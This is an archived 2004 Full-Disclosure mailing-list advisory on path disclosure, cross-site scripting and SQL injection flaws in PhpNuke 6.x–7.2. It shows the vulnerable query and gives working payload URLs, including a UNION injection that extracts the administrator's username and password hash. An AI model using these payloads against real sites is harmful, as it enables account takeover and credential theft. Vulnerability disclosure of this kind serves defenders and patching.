[Full-Disclosure] [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 05/05/04

Next message: Rodrigo Barbosa: "Re: [Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : apache multiple vulnerabilities, upgraded to apache-1.3.29"

Previous message: Shashank Rai: "RE: [Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: full-disclosure@lists.netsys.com
Date: Wed, 5 May 2004 08:52:38 -0700 (PDT)

{================================================================================}
{ [waraxe-2004-SA#027]
                          }
{================================================================================}
{
                          }
{ [ Once again - critical vulnerabilities in
PhpNuke 6.x - 7.2 ] }
{
                          }
{================================================================================}



Author: Janek Vind "waraxe"
Date: 05. May 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=27

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Php-Nuke is a popular freeware content management
system, written in php by
Francisco Burzi. This CMS (Content Management System)
is used on many thousands
websites, because it's freeware, easy to install and
has broad set of features.

Homepage: http://phpnuke.org

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1 - unsanitaized user submitted variable "show" can
triger standard php error messages,
revealing full path to script - information, needed
for potential hacker.

Example: make http request like this:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

and error message appears:

Warning: Division by zero in
D:\apache_wwwroot\nuke72\modules\Downloads\index.php
on line 797

B. Cross-site scripting aka XSS:

XSS can be used for cookie stealing, and because in
PhpNuke authentication-related information
is stored in cookies, account's hijacking and ID spoof
can happen.

B1 - XSS through unsanitaized user submitted variable
"ttitle":

http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
code here]
http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
onload=document.title=1337>

B2 - XSS through unsanitaized user submitted variable
"sid":

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss
code here]

C. Sql injection:

C1 - noncritical sql injection through unsanitaized
user submitted variable "orderby":

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&orderby=foobar

C3 - critical sql injection through unsanitaized user
submitted variable "sid":

Let's look at original code from
"nuke72/modules/Downloads/index.php" line 901:

$result=$db->sql_query("
SELECT lid, url, title, description, date, hits,
downloadratingsummary, totalvotes,
totalcomments, filesize, version, homepage
FROM ".$prefix."_downloads_downloads
WHERE sid=$sid
order by $orderby
limit $min,$perpage
");

Oops, "$sid" variable is unquoted in sql query.
Scary...
What, if we request something like:

http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

Cool - admin's username and password's md5 hash in
plaintext :)

Have a nice day!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greets to Raido Kerna and to all bugtraq readers in
Estonia! Tervitused!
Special greets to http://www.gamecheaters.us staff!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ]
------------------------------------

__________________________________
Do you Yahoo!?
Win a $20,000 Career Makeover at Yahoo! HotJobs
http://hotjobs.sweepstakes.yahoo.com/careermakeover

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Rodrigo Barbosa: "Re: [Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : apache multiple vulnerabilities, upgraded to apache-1.3.29"

Previous message: Shashank Rai: "RE: [Full-Disclosure] RE: Full-Disclosure digest, Catching Sasser"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[Full-Disclosure] [waraxe-2004-SA#036 - Multiple security holes in PhpNuke - part 3]
... Php-Nuke is a popular freeware content management ... This CMS (Content Management System) ... As result there will be standard php error messages, ... possibility to use blind sql injection methods. ...
(Full-Disclosure)
[Full-Disclosure] [waraxe-2004-SA#035 - Multiple security holes in PhpNuke - part 2]
... Php-Nuke is a popular freeware content management ... This CMS (Content Management System) ... B - Sql Injection ... Special greets to icenix and slimjim100! ...
(Full-Disclosure)
PHP Security Framework: Vuln and Security Bypass
... Summary: Remote File Inclusion ... SQL Injection Protection Bypass ... So this can lead to RFI if the php directives ... The code for the Administrator class is situated in the ...
(Bugtraq)
[waraxe-2010-SA#078] - Multiple Vulnerabilities in CruxCMS 3.0.0
... It is written in PHP and uses the powerful MySQL database. ... Reason: directly accessible php script ... Attack vector: specially crafted POST request ... As seen above there is SQL Injection in "LIMIT x,y" part of the SQL query. ...
(Bugtraq)
Re: PHP and MySQL
... I am wondering if anyone has deployed a commercial WFA to prevent common attacks(XSS, SQL Injection and etc) on the web application? ... Besides the PHP ... // error handling obligatory field not set - default, output, whatever ...
(Pen-Test)